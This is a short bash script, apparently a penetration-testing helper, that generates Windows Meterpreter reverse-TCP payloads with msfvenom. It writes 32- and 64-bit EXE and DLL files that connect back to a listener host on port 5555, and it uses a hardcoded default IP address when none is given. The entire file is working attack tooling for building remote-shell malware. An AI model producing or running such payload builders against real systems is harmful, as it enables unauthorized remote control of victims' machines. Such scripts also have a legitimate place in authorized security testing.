#!/usr/bin/env bash
# ******************************************************
# Author       : kaleo
# Last modified: 2017-05-22 09:24
# Email        : kaleo1990@hotmail.com
# Filename     : createpayload
# Description  : 
# ******************************************************
echo eg: pcreatepayload 120.24.159.2
if [ ! -n "$1" ]; then
    lhost='120.24.159.2'
else
    lhost=$1
fi
echo $lhost
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=5555 -f exe > cmd_32.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=5555 -f dll > cmd_32.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$lhost LPORT=5555 -f exe > cmd_64.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$lhost LPORT=5555 -f dll > cmd_64.dll
